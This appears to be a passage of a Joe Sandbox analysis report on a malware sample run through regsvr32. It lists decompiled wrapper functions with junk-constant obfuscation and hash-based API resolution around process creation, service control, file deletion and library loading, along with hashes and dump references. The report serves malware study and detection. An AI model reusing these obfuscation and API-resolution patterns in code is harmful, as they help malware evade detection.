Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d42022e33bd6733196072069e8e03542d2798304e1a2ed2ef808d1cb9f80a01
Instruction ID: 610e357eca3fced8b99db286ae9b3bdfdd7b9f7520bf6e290c84fcbe88973eb1
Opcode Fuzzy Hash: 8d42022e33bd6733196072069e8e03542d2798304e1a2ed2ef808d1cb9f80a01
Instruction Fuzzy Hash: BFA19136B0431A8FD308DF5CD9C1645FBE6FBC8350F05C63AD5488B36AE670AA598AD4

Uniqueness

Uniqueness Score: -1.00%

Function 003DF423 Relevance: 1.6, APIs: 1, Instructions: 75
processCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E003DF423(int __ecx, struct _STARTUPINFOW* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, intOrPtr _a56, intOrPtr _a60, struct _PROCESS_INFORMATION* _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t43;
				int _t51;
				signed int _t54;
				int _t59;
				struct _STARTUPINFOW* _t60;

				_push(_a68);
				_t60 = __edx;
				_push(0);
				_push(_a60);
				_t59 = __ecx;
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t43);
				_v28 = 0x83cf4;
				_v24 = 0x1eb0c;
				_v20 = 0x9f2f8;
				_v16 = 0x28f804;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x47c45cc0;
				_v8 = 0x8ad8cf;
				_v8 = _v8 ^ 0x386eefb6;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x3776ee1a;
				_v12 = 0xb92135;
				_t54 = 0x1e;
				_v12 = _v12 / _t54;
				_v12 = _v12 ^ 0x0002f1af;
				E003C6F64(0xa2704296, _t54, _t54, 0xbfd2d08a, 0x2d7);
				_t51 = CreateProcessW(_a52, _a4, 0, 0, _t59, 0, 0, 0, _t60, _a68); // executed
				return _t51;
			}

0x003df42c
0x003df431
0x003df433
0x003df434
0x003df437
0x003df439
0x003df43c
0x003df43f
0x003df440
0x003df443
0x003df446
0x003df449
0x003df44c
0x003df44d
0x003df44e
0x003df44f
0x003df452
0x003df455
0x003df458
0x003df45b
0x003df45c
0x003df45d
0x003df462
0x003df46c
0x003df475
0x003df47c
0x003df483
0x003df487
0x003df48e
0x003df495
0x003df49c
0x003df4a0
0x003df4a7
0x003df4b3
0x003df4bb
0x003df4be
0x003df4da
0x003df4f2
0x003df4fa

APIs

CreateProcessW.KERNEL32(?,0002F1AF,00000000,00000000,0112E130,00000000,00000000,00000000,?,?), ref: 003DF4F2

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 89c47c55b78eb8eb065f71e279081a821e0499847fc4bad1336bbffb059a6912
Instruction ID: 87af84d74c04a4fe494958c534af7d59625e2334d23de7ed7b4829de0d2205c2
Opcode Fuzzy Hash: 89c47c55b78eb8eb065f71e279081a821e0499847fc4bad1336bbffb059a6912
Instruction Fuzzy Hash: 23210A7290120CBFAF059F95CD49CEEBFB9EF48398F508158FA1466110C3728E64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003CD5B0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003CD5B0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t37;
				intOrPtr* _t45;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;

				_t55 = __edx;
				_t54 = __ecx;
				E003C2528(_t37);
				_v28 = 0xad39f;
				_v24 = 0xde296;
				_v20 = 0;
				_v8 = 0x70c466;
				_v8 = _v8 << 0xc;
				_t49 = 7;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 / _t49;
				_v8 = _v8 ^ 0x05ce2cd5;
				_v16 = 0xa4ad72;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x2b5a0495;
				_v12 = 0x520372;
				_v12 = _v12 ^ 0x172d204c;
				_v12 = _v12 + 0xffffaf49;
				_v12 = _v12 ^ 0x1774e52f;
				_t45 = E003C6F64(0xb0aa831, _t49, _t49, 0xfd28539d, 0x245);
				_t46 =  *_t45(0, _t54, 0, 0, _t55, __ecx, __edx, _a4, _a8, _a12, _a16, 0, _a24, 0, 0); // executed
				return _t46;
			}

0x003cd5bb
0x003cd5c2
0x003cd5d3
0x003cd5d8
0x003cd5e2
0x003cd5eb
0x003cd5ee
0x003cd5f5
0x003cd5ff
0x003cd60a
0x003cd613
0x003cd616
0x003cd61d
0x003cd624
0x003cd628
0x003cd62f
0x003cd636
0x003cd63d
0x003cd644
0x003cd65a
0x003cd667
0x003cd66f

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003CD667

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 3e4d0cd4ef98b2ed46fc4406835a32c7c39bdcfc447735a49e47ea24f902b1ee
Instruction ID: 7207c5fe56a2bc2505dab2d2052d8584bc87b87e4c36f06d360be5a765256721
Opcode Fuzzy Hash: 3e4d0cd4ef98b2ed46fc4406835a32c7c39bdcfc447735a49e47ea24f902b1ee
Instruction Fuzzy Hash: 822156B1D0020CFFDF04DF95DC898AEBBB9EB49354F208499F915AA251D2705F109B60

Uniqueness

Uniqueness Score: -1.00%

Function 003D5053 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E003D5053(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t50;
				signed int _t52;
				signed int _t53;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E003C2528(_t40);
				_v32 = 0x2a9d;
				_v28 = 0xe590d;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x93a489;
				_v16 = _v16 | 0xa6ef63c2;
				_v16 = _v16 ^ 0xa6f135cf;
				_v8 = 0x549a1b;
				_v8 = _v8 >> 0xe;
				_t52 = 0x71;
				_v8 = _v8 / _t52;
				_v8 = _v8 + 0xffff394e;
				_v8 = _v8 ^ 0xfff69fe6;
				_v12 = 0x6df274;
				_t53 = 0x21;
				_v12 = _v12 / _t53;
				_v12 = _v12 + 0xaad;
				_v12 = _v12 ^ 0x000c8a78;
				E003C6F64(0x16a6f636, _t53, _t53, 0x28caee4, 0x10f);
				_t50 = OpenSCManagerW(0, 0, _a12); // executed
				return _t50;
			}

0x003d505a
0x003d505f
0x003d5060
0x003d5063
0x003d5065
0x003d506a
0x003d5074
0x003d507d
0x003d5080
0x003d5083
0x003d508a
0x003d5091
0x003d5098
0x003d509f
0x003d50a8
0x003d50ad
0x003d50b2
0x003d50b9
0x003d50c0
0x003d50ca
0x003d50d2
0x003d50d5
0x003d50dc
0x003d50f8
0x003d5105
0x003d510b

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,04DBE7AE,?,?,?,?,?,?,?,?,000003D7), ref: 003D5105

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 062b265e0c38660167146bf6ec40f1bd107cb5be0e2a6583e77f8a68c1b24397
Instruction ID: 276c1d917d07f7cf13b0d6e74287febbb83c84935a9b8e294c0f95fd44dfabf6
Opcode Fuzzy Hash: 062b265e0c38660167146bf6ec40f1bd107cb5be0e2a6583e77f8a68c1b24397
Instruction Fuzzy Hash: 2C116471E00208FBDB14DFEAC84A8DEBFB5EF05324F108089E504AA250D3B54B54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C216E Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E003C216E(void* __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t34;
				void* _t43;
				signed int _t45;
				void* _t51;

				_push(_a12);
				_t51 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003C2528(_t34);
				_v32 = 0xa8d99;
				asm("stosd");
				asm("stosd");
				_t45 = 0x5d;
				asm("stosd");
				_v8 = 0x801b8c;
				_v8 = _v8 + 0xb63c;
				_v8 = _v8 + 0x64a0;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00078271;
				_v16 = 0xc3659c;
				_v16 = _v16 + 0xa438;
				_v16 = _v16 ^ 0x00c6ab86;
				_v12 = 0xefb99d;
				_v12 = _v12 / _t45;
				_v12 = _v12 ^ 0x0005aece;
				E003C6F64(0x80ecea7b, _t45, _t45, 0xbfd2d08a, 0x232);
				_t43 = RtlAllocateHeap(_t51, _a12, _a8); // executed
				return _t43;
			}

0x003c2176
0x003c2179
0x003c217b
0x003c217e
0x003c2182
0x003c2183
0x003c2188
0x003c2197
0x003c219c
0x003c219d
0x003c21a8
0x003c21a9
0x003c21b0
0x003c21b7
0x003c21be
0x003c21c2
0x003c21c9
0x003c21d0
0x003c21d7
0x003c21de
0x003c21eb
0x003c21ee
0x003c2204
0x003c2213
0x003c221a

APIs

RtlAllocateHeap.NTDLL(?,?,00C6AB86), ref: 003C2213

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 877309134cd3abf4ec97cce20064ae1a94fc221f075e1fc1519e893e8fec8534
Instruction ID: 6de908dbcc004d7cd1a032b038435ab95b1448a4eef09bdbc59b230c59e6ce97
Opcode Fuzzy Hash: 877309134cd3abf4ec97cce20064ae1a94fc221f075e1fc1519e893e8fec8534
Instruction Fuzzy Hash: 141146B6D00208FBDF04DFD4C80A9DEBBB5EF85324F008088EA04A6250E3B95B189F91

Uniqueness

Uniqueness Score: -1.00%

Function 003D99D4 Relevance: 1.6, APIs: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E003D99D4(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t36;
				void* _t44;
				signed int _t46;
				void* _t51;
				int _t52;

				_push(_a16);
				_t51 = __edx;
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t36);
				_v20 = 0xb0be;
				_v16 = 0xa0f70;
				_v12 = 0x1ae6;
				_v12 = _v12 >> 8;
				_v12 = _v12 | 0x9edc00d8;
				_v12 = _v12 ^ 0x9ed4785b;
				_v16 = 0xd7138f;
				_t46 = 0x6e;
				_v16 = _v16 / _t46;
				_v16 = _v16 ^ 0x00087cf8;
				_v8 = 0xf9eec1;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xc251;
				_v8 = _v8 | 0x3f79b110;
				_v8 = _v8 ^ 0x3f7794ea;
				E003C6F64(0x49feba1e, _t46, _t46, 0x28caee4, 0x13b);
				_t44 = OpenServiceW(_t51, _a12, _t52); // executed
				return _t44;
			}

0x003d99dc
0x003d99df
0x003d99e1
0x003d99e3
0x003d99e6
0x003d99e9
0x003d99ec
0x003d99ed
0x003d99ee
0x003d99f3
0x003d99fd
0x003d9a06
0x003d9a0d
0x003d9a11
0x003d9a18
0x003d9a1f
0x003d9a2b
0x003d9a33
0x003d9a36
0x003d9a3d
0x003d9a44
0x003d9a48
0x003d9a4f
0x003d9a56
0x003d9a72
0x003d9a7f
0x003d9a86

APIs

OpenServiceW.ADVAPI32(000003D7,0000B0BE,?,?,?,?,?,?,?,?,?,00000000,000003D7), ref: 003D9A7F

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 05cb593e6776f8720f40e16095b93bc29f3b4ae51e993e5b1b1860102ad532ef
Instruction ID: 031bdbe19a6fa56600b466c4495adfb7b4e2896d9a3d7bca9e24715fe9bef644
Opcode Fuzzy Hash: 05cb593e6776f8720f40e16095b93bc29f3b4ae51e993e5b1b1860102ad532ef
Instruction Fuzzy Hash: 7A114676D00208FBDF04DFDAC84A8DEBBB5EF45704F108089E924A7250E7B55B24DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003DA952 Relevance: 1.5, APIs: 1, Instructions: 44
serviceCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E003DA952(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t35;
				int _t44;
				signed int _t46;

				_push(_a8);
				_push(_a4);
				E003C2528(_t35);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x2ed56;
				_v16 = 0xd6c71c;
				_v16 = _v16 ^ 0xb803002a;
				_v16 = _v16 ^ 0xb8deec5c;
				_v8 = 0x70049b;
				_t46 = 0x74;
				_v8 = _v8 * 0x67;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t46;
				_v8 = _v8 ^ 0x00c89d1a;
				_v12 = 0xe5b045;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000283fc;
				E003C6F64(0x39936f17, _t46, _t46, 0x28caee4, 0x23e);
				_t44 = CloseServiceHandle(_a8); // executed
				return _t44;
			}

0x003da958
0x003da95b
0x003da960
0x003da965
0x003da96c
0x003da975
0x003da97c
0x003da983
0x003da98a
0x003da997
0x003da9a2
0x003da9a5
0x003da9ae
0x003da9b1
0x003da9b8
0x003da9bf
0x003da9c3
0x003da9c7
0x003da9dd
0x003da9e8
0x003da9ed

APIs

CloseServiceHandle.ADVAPI32(B8DEEC5C), ref: 003DA9E8

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 4117415087f2ab22f0743ae43d7550e93081f0f4b8c13af8f698824d627ad6ea
Instruction ID: 758d5bc8cf3455fff8c1447ae560d77e6c8a124c2e7df543269a19cfd00ae641
Opcode Fuzzy Hash: 4117415087f2ab22f0743ae43d7550e93081f0f4b8c13af8f698824d627ad6ea
Instruction Fuzzy Hash: 7B1157B5D0120CFBDF04EFE8D90AAAEBBB0EB10304F20C088E414AB290D7B55B14CB84

Uniqueness

Uniqueness Score: -1.00%

Function 003DEE45 Relevance: 1.5, APIs: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E003DEE45(void* __ecx, void* __edx, WCHAR* _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				int _t38;
				signed int _t40;

				_push(_a4);
				E003C2528(_t30);
				_v16 = 0x7715;
				_v16 = 0xe656bb;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x0e66b312;
				_v12 = 0xd54794;
				_v12 = _v12 + 0x7442;
				_v12 = _v12 ^ 0x00dbad13;
				_v8 = 0x59f9a2;
				_v8 = _v8 << 1;
				_t40 = 7;
				_v8 = _v8 / _t40;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0005c87b;
				E003C6F64(0x61a59502, _t40, _t40, 0xbfd2d08a, 9);
				_t38 = DeleteFileW(_a4); // executed
				return _t38;
			}

0x003dee4b
0x003dee50
0x003dee55
0x003dee5f
0x003dee68
0x003dee6c
0x003dee73
0x003dee7a
0x003dee81
0x003dee88
0x003dee8f
0x003dee97
0x003dee9c
0x003dee9f
0x003deea2
0x003deebe
0x003deec9
0x003deece

APIs

DeleteFileW.KERNEL32(00DBAD13), ref: 003DEEC9

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 39abb3544c19608eb9dfc935e545f7e6d4307e8a2d514f54c7c478c65c2abaf0
Instruction ID: 8d8e2713e4f66af33ba272046a30123f53dc1fc03fd91bb25734faae88ee1fa7
Opcode Fuzzy Hash: 39abb3544c19608eb9dfc935e545f7e6d4307e8a2d514f54c7c478c65c2abaf0
Instruction Fuzzy Hash: 73015E71D04208FBDB05DFE4D90AA9DBBB4EB40304F208098E915AB290E7B5AF68DF51

Uniqueness

Uniqueness Score: -1.00%

Function 003CD670 Relevance: 1.5, APIs: 1, Instructions: 39
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E003CD670(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t33;
				struct HINSTANCE__* _t39;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003C2528(_t33);
				_v16 = 0xf4d06;
				_v12 = 0x5404e4;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xb582df74;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x5ac6b88c;
				_v16 = 0x81adee;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x0009bc6e;
				_v8 = 0x5ad66e;
				_v8 = _v8 << 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x4437;
				_v8 = _v8 ^ 0x02d06663;
				E003C6F64(0xfbae0770, __ecx, __ecx, 0xbfd2d08a, 0x8e);
				_t39 = LoadLibraryW(_a8); // executed
				return _t39;
			}

0x003cd676
0x003cd679
0x003cd67d
0x003cd67e
0x003cd683
0x003cd68d
0x003cd694
0x003cd698
0x003cd69f
0x003cd6a2
0x003cd6a9
0x003cd6b0
0x003cd6b4
0x003cd6b7
0x003cd6be
0x003cd6c5
0x003cd6c9
0x003cd6cd
0x003cd6d4
0x003cd6f5
0x003cd700
0x003cd705

APIs

LoadLibraryW.KERNEL32(0009BC6E), ref: 003CD700

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 10ec82d59e3dc17a1e79c0d695acb6648fcaa1bf077b44ecb67951beac119516
Instruction ID: dfb1b5c76075fe76b3c01e95d063729b2fd8bbf766d5f85d99427562edaf2fa8
Opcode Fuzzy Hash: 10ec82d59e3dc17a1e79c0d695acb6648fcaa1bf077b44ecb67951beac119516
Instruction Fuzzy Hash: 3901F0B2C0020CFBCB09EFE4D94A99EBBB4EB00704F60C188E915A7251D7B59B58DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001A7A8 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 55%

			E1001A7A8(intOrPtr _a4) {
				void* _t2;
				void* _t7;
				intOrPtr _t8;
				void* _t13;

				_t8 = _a4;
				_t13 = _t8 -  *0x10090f2c; // 0x3f8
				if(_t13 > 0) {
					L3:
					if(_t8 == 0) {
						_t8 = 1;
					}
					_t2 = RtlAllocateHeap( *0x100967a8, 0, _t8 + 0x0000000f & 0xfffffff0); // executed
					return _t2;
				}
				E1001F3A0(9);
				_push(_t8);
				_t7 = E1001FF09();
				E1001F401(9);
				if(_t7 == 0) {
					goto L3;
				}
				return _t7;
			}

0x1001a7a9
0x1001a7ad
0x1001a7b4
0x1001a7d7
0x1001a7d9
0x1001a7dd
0x1001a7dd
0x1001a7ed
0x00000000
0x1001a7ed
0x1001a7b8
0x1001a7bd
0x1001a7c5
0x1001a7c7
0x1001a7d1
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,1001A78C,000000E0,1001A779,?,1001F3C0,00000018,?,?,?,1001A732,00000009,?), ref: 1001A7ED

Part of subcall function 1001F3A0: InitializeCriticalSection.KERNEL32(00000000,?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3DD
Part of subcall function 1001F3A0: EnterCriticalSection.KERNEL32(?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3F8

Part of subcall function 1001F401: LeaveCriticalSection.KERNEL32(?,1001A7CC,00000009,?,00000009,?,?,1001A78C,000000E0,1001A779,?,1001F3C0,00000018,?,?), ref: 1001F40E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitializeLeave
String ID:
API String ID: 495028619-0
Opcode ID: f03a35d37bb1e631a98658e2bcb82517e85e640a3961d100f9112b539c099617
Instruction ID: f5470f16ef7d24c28a65f4f4c5430393499c8680a6b029f91a7350068011d86c
Opcode Fuzzy Hash: f03a35d37bb1e631a98658e2bcb82517e85e640a3961d100f9112b539c099617
Instruction Fuzzy Hash: DFE061379495306BD511E2685C41BDA62A1EF82760F170025FE587F6D2F771EEC152C0

Uniqueness

Uniqueness Score: -1.00%

Function 1001EA20 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001EA20() {
				long _t2;
				int _t3;

				E1001F334();
				_t2 =  *0x10090cf0; // 0xffffffff
				if(_t2 != 0xffffffff) {
					_t3 = TlsFree(_t2); // executed
					 *0x10090cf0 =  *0x10090cf0 | 0xffffffff;
					return _t3;
				}
				return _t2;
			}

0x1001ea20
0x1001ea25
0x1001ea2d
0x1001ea30
0x1001ea36
0x00000000
0x1001ea36
0x1001ea3d

APIs

Part of subcall function 1001F334: DeleteCriticalSection.KERNEL32(00000000,?,?,1001EA25,1001A8F7,1001A950,?,?,?), ref: 1001F368
Part of subcall function 1001F334: DeleteCriticalSection.KERNEL32(?,?,1001EA25,1001A8F7,1001A950,?,?,?), ref: 1001F383
Part of subcall function 1001F334: DeleteCriticalSection.KERNEL32 ref: 1001F38B
Part of subcall function 1001F334: DeleteCriticalSection.KERNEL32 ref: 1001F393
Part of subcall function 1001F334: DeleteCriticalSection.KERNEL32 ref: 1001F39B

TlsFree.KERNEL32(FFFFFFFF,1001A8F7,1001A950,?,?,?), ref: 1001EA30

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
